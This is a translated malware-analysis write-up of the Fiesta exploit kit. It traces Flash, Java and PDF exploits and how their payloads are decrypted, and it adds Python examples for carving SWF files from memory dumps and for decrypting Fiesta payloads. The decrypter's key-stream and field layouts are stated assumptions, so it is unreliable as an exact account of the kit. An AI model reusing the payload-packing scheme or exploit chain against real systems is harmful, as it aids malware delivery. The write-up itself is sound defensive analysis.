                    CVE-2013-2551: Microsoft Internet Explorer 6 through 11
                    

                    Interestingly, the Fiesta exploit kit focuses entirely on Internet Explorer; the detection of the Adobe PDF, Adobe Flash and Java plugins is also only used for IE.

                    0x02 Following the flash exploit landing page trail


                    From the network capture we can establish that the VM was attacked with the Flash exploit, and comparing the URLs shows that CVE-2014-8439 was used.

                    This CVE was originally discovered by kafeine as a 0-day in the Angler exploit kit: CVE-2014-0569 (Flash Player) integrating Exploit Kit / Out-of-Band Flash Player Update for CVE-2014-8439.

                    After decompiling the ActionScript code we find a script:

                    image

                    The code after tidying:

                    image

                    The screenshot is not quite complete; one function, LoadComplete, is not shown:

                    image

                    The stage 2 data is appended to the root/main object. Stage 2 is in fact another Flash file, and the addChild function activates it. Dumping the decrypted stage 2 data from memory, we can see the Flash file header:

                    image
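
The memory-dump step above, as an added Python example (not code from the original post or from the Fiesta kit): a small carver that locates SWF headers (FWS uncompressed, CWS zlib-compressed) in an arbitrary byte buffer such as a process dump, checks the header's length field against the data that follows, and rewrites CWS hits as FWS so they can go straight into a decompiler. The sample buffer, its body bytes and the version cap of 40 are constructed for the example.

```python
import struct
import zlib

SWF_SIGNATURES = (b"FWS", b"CWS")   # uncompressed / zlib-compressed SWF
MAX_SWF_VERSION = 40                 # assumed sanity cap on the 1-byte version field

def carve_swf(buf: bytes, max_len: int = 64 * 1024 * 1024):
    """Return [(offset, kind, swf_bytes)] for every plausible SWF in buf.

    SWF header: 3-byte signature, 1-byte version, uint32 LE length. For FWS the
    length is the total file size; for CWS it is the size after inflating the
    zlib stream that starts at offset 8. CWS hits are returned inflated (as FWS)
    with the original version and length fields kept.
    """
    found = []
    for sig in SWF_SIGNATURES:
        start = 0
        while (off := buf.find(sig, start)) != -1:
            start = off + 1
            if off + 8 > len(buf):
                continue
            version = buf[off + 3]
            length = struct.unpack_from("<I", buf, off + 4)[0]
            if not (1 <= version <= MAX_SWF_VERSION) or length < 8 or length > max_len:
                continue  # signature bytes appeared by chance
            if sig == b"FWS":
                if off + length > len(buf):
                    continue  # length field points past the end of the dump
                found.append((off, "FWS", bytes(buf[off:off + length])))
            else:
                try:
                    # decompressobj tolerates trailing data after the zlib stream
                    body = zlib.decompressobj().decompress(buf[off + 8:])
                except zlib.error:
                    continue
                if len(body) != length - 8:
                    continue  # truncated or not really a SWF
                header = b"FWS" + bytes([version]) + struct.pack("<I", length)
                found.append((off, "CWS", header + body))
    found.sort(key=lambda hit: hit[0])
    return found

def make_swf(body: bytes, compressed: bool, version: int = 15) -> bytes:
    """Build a constructed SWF container around arbitrary body bytes (test data only)."""
    length = 8 + len(body)
    data = zlib.compress(body) if compressed else body
    return (b"CWS" if compressed else b"FWS") + bytes([version]) + struct.pack("<I", length) + data

# Constructed stand-in for a memory dump: padding, a decoy "FWS" with version 0,
# one compressed SWF, some filler, and one uncompressed SWF.
SAMPLE_BODY = bytes(range(256)) * 4
SAMPLE_DUMP = (
    b"\x00" * 100
    + b"FWS\x00\xff\xff\xff\xff" + b"junk" * 10
    + make_swf(SAMPLE_BODY, compressed=True)
    + b"\x90" * 50
    + make_swf(SAMPLE_BODY, compressed=False)
    + b"\x00" * 30
)

if __name__ == "__main__":
    for off, kind, swf in carve_swf(SAMPLE_DUMP):
        print(f"{kind} at offset {off}: {len(swf)} bytes")
```

The carver validates only the container, not the tag stream inside it, so on a real dump it may still surface fragments that a decompiler rejects; the length check and the version cap are what keep chance signature matches out of the result.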

                    Decompiling this Flash file gives about 820 lines of ActionScript. I do not intend to go deeper into how this vulnerability is exploited; if you want to know, someone has already written about it: An interesting case of CVE-2014-8439 exploit.

                    The ActionScript code in the screenshot only handles the first stage, packing and loading; the second stage does the actual exploitation to gain code execution. To get there, the garbage collector holds a pointer to an ITelemetry object; by supplying an ITelemetry object with a carefully constructed virtual table, execution is obtained: the modified ITelemetry vtable replaces the legitimate ITelemetry functions with pointers to the shellcode.

                    After decompiling the embedded Flash file (stage 2) we get a simple ActionScript script and find an interesting function, initialization, whose code references a variable on the target web page and then calls a few functions:

                    image

                    If we follow the seatk function we see code very similar to before: a string decryption function:

                    image

                    It seems Fiesta uses the same encryption/obfuscation function in many places; the data this function returns, once decoded, is the shellcode used together with the ROP chain.

                    Since this Flash vulnerability (CVE-2014-8439) was only just discovered and no PoC has been released, I will not disclose the exploitation details.

                    We now know how Fiesta's current attacks are built:

                    The landing page supplies the information on which shellcode/payload to use
                    The exploit is packed to evade detection
                    The stage 3 exploit shows it is a framework in which the exploit can easily be swapped out

                    Next, the Java exploit.

                    0x03 Decrypting the Java payload


                    The Java exploit sample is based on CVE-2013-2465:

                    5c6c4a6a4c5adc49edabd21c0779c6e3

                    From the landing page we can see that the 'JavaExploit_CVE20132465' function is what embeds the Java applet.

                    After decompiling the jar we get somewhat obfuscated Java source. Reviewing it, one of the functions downloads the payload and executes it. After cleaning up the Java source we get a clear version, shown in the image below.

                    image

                    Looking at the top of the function first, the exploit appears to support different payloads.

                    After downloading the payload it reads the first 256 bytes, which hold the XOR key, followed by the effective part of the payload; we can examine how these 256 bytes differ in the VM.

                    image

                    The key piece of Java code is the "Decrypt" function, which decodes the payload. After restoring the Java source, this function looks as follows:

                    image

                    The first part of the code walks the data to be decrypted byte by byte using two indices; the key values at the two indices are swapped, and their sum, hidden in the expression, selects the key position used in the XOR.

                    This XOR decryption is applied to the whole of the recovered PE data. From the earlier code segment we can also see that the payload's file name is purely numeric: the current time on the machine.

                    After converting the Java code to Python we can decode it easily.

                    images

                    After successfully decoding the data we have the Fiesta payload. Now let's try the same on the payload of the Flash exploit discussed earlier.

                    images

                    Unfortunately it does not seem to work: running the decryption on the payloads of the Flash, Adobe PDF and Silverlight exploits returns errors in every case. These do not appear to be plain Java code but shellcode that takes control of execution, and they use a different encryption scheme. From the payload decrypted on disk we can see that it differs from the initial 256-byte XOR block; the payload can carry any shellcode.

                    images

                    Now we need to look at the shellcode in the exploits. We have already looked at the Flash exploit but stopped at the exploitation point, and we can now decrypt the payload via the Java exploit, so let's look at another type: Adobe PDF.

                    0x04 Adobe PDF exploit


                    Sample: f4346a65ea040c1c40fac10afa9bd59d

                    Analysing the PDF with peepdf:

                    image

                    peepdf tells us there is an AcroForm and some JavaScript. Looking at the AcroForm, we see that the initialisation call actually uses JavaScript; keep following the object references until we find the XFA:

                    image

                    Scrolling down we find the real AcroForm script, and with it the (obfuscated) JavaScript code set up at initialisation:

                    image

                    Cleaning up the code and looking at the end to see how the vulnerability is triggered: in this JavaScript, a malicious image object is created with the shellcode:

                    image

                    Extracting expl_imgdata before it is passed to the image, we can base64-decode it and look at the shellcode. In the shellcode we find the real decryption function, which is exactly the same as the one in the Java exploit.

                    Before the 256-byte XOR key there are 16 (extra) bytes holding information. The shellcode downloads the payload, and the first 16 bytes are used to determine the actual payload size; these values are XORed, with the first 4 bytes being the XOR key for the following 12 bytes. It looks like this:

                    image

                    To decrypt this payload we can skip the first 16 bytes. The decrypted data has 25 extra bytes, after which comes a normal MZ header, so we have a valid PE. What is in those bytes? More information needed to place the file on the system: the data before the MZ header is the file size and the file name on disk:

                    image

                    With this information we get an executable PE file. The decrypted sample can be downloaded here: 31af1a5656ce741889984e8e878c7836

                    I wrote a Python script that can decrypt any Fiesta payload from network data; it has been tested on the last 10 Fiesta EK samples. It takes two arguments: the first is the file to decrypt, the second the output file, into which a valid PE file is written:
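
The payload layout described in the Java section and in the PDF section above, as an added Python example (not the author's decrypter and not Fiesta's code): it peels the 16-byte size header (4-byte key XORed over the next 12 bytes), takes the 256-byte key that follows, runs the two-index swap-and-sum key stream the article describes over the body, and then splits off the 25-byte prefix ahead of the MZ header. The key stream here is RC4's output stage applied directly to the 256-byte key; whether Fiesta schedules the key first is not stated and is an assumption. The exact field layout of the 12 decrypted size bytes (little-endian uint32 first) and of the 25-byte prefix (uint32 size plus NUL-padded name) are also assumptions, and the blob, key and fake PE are constructed so the example round-trips offline.

```python
import struct

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (used for the 12-byte size header)."""
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))

def keystream(key: bytes, n: int) -> bytes:
    """Two indices walk a 256-byte state, swap the two bytes, and their sum picks the
    byte XORed into the data: the shape the article describes for Fiesta's Decrypt().
    Assumption: no key-scheduling pass precedes this (RC4's output stage only)."""
    s = bytearray(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decrypt_fiesta_payload(blob: bytes):
    """Return (on-disk name, PE bytes) or raise ValueError when the layers do not line up."""
    if len(blob) < 16 + 256:
        raise ValueError("blob too short for header and key")
    size_hdr = xor_bytes(blob[4:16], blob[:4])          # first 4 bytes key the next 12
    payload_len = struct.unpack_from("<I", size_hdr)[0]  # assumed field layout
    key = blob[16:16 + 256]
    body = blob[272:272 + payload_len]
    if len(body) != payload_len:
        raise ValueError("truncated body")
    plain = xor_bytes(body, keystream(key, len(body)))
    if plain[25:27] != b"MZ":
        raise ValueError("no MZ header at offset 25")
    file_size = struct.unpack_from("<I", plain)[0]       # assumed 25-byte prefix layout
    name = plain[4:25].rstrip(b"\0").decode("ascii", "replace")
    pe = plain[25:25 + file_size]
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return name, pe

def is_valid_blob(blob: bytes) -> bool:
    try:
        decrypt_fiesta_payload(blob)
        return True
    except ValueError:
        return False

# --- constructed test data only; the inverse is not something the kit ships ---
def encrypt_fiesta_payload(pe: bytes, name: str, key: bytes, hdr_key: bytes) -> bytes:
    prefix = struct.pack("<I", len(pe)) + name.encode("ascii").ljust(21, b"\0")
    plain = prefix + pe
    body = xor_bytes(plain, keystream(key, len(plain)))
    size_hdr = xor_bytes(struct.pack("<I", len(body)) + b"\0" * 8, hdr_key)
    return hdr_key + size_hdr + key + body

def make_fake_pe(size: int = 512) -> bytes:
    """Minimal MZ/PE skeleton: e_lfanew at 0x3C pointing at a 'PE\\0\\0' signature."""
    pe = bytearray(size)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)
    pe[0x80:0x84] = b"PE\0\0"
    return bytes(pe)

def tamper(blob: bytes, offset: int) -> bytes:
    out = bytearray(blob)
    out[offset] ^= 0xFF
    return bytes(out)

SAMPLE_KEY = bytes((i * 7 + 3) & 0xFF for i in range(256))
SAMPLE_BLOB = encrypt_fiesta_payload(make_fake_pe(), "1415926535", SAMPLE_KEY, b"\x12\x34\x56\x78")

if __name__ == "__main__":
    name, pe = decrypt_fiesta_payload(SAMPLE_BLOB)
    print(name, len(pe), pe[:2])
```

The MZ check at offset 25 and the PE signature lookup are what make the script useful on captured traffic: when either fails, the capture is not a Fiesta payload in this format (or the key stream assumption does not hold for that sample), and the error says which layer broke rather than silently writing garbage to disk.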

                    https://github.com/0x3a/tools/blob/master/fiesta-payload-decrypter.py
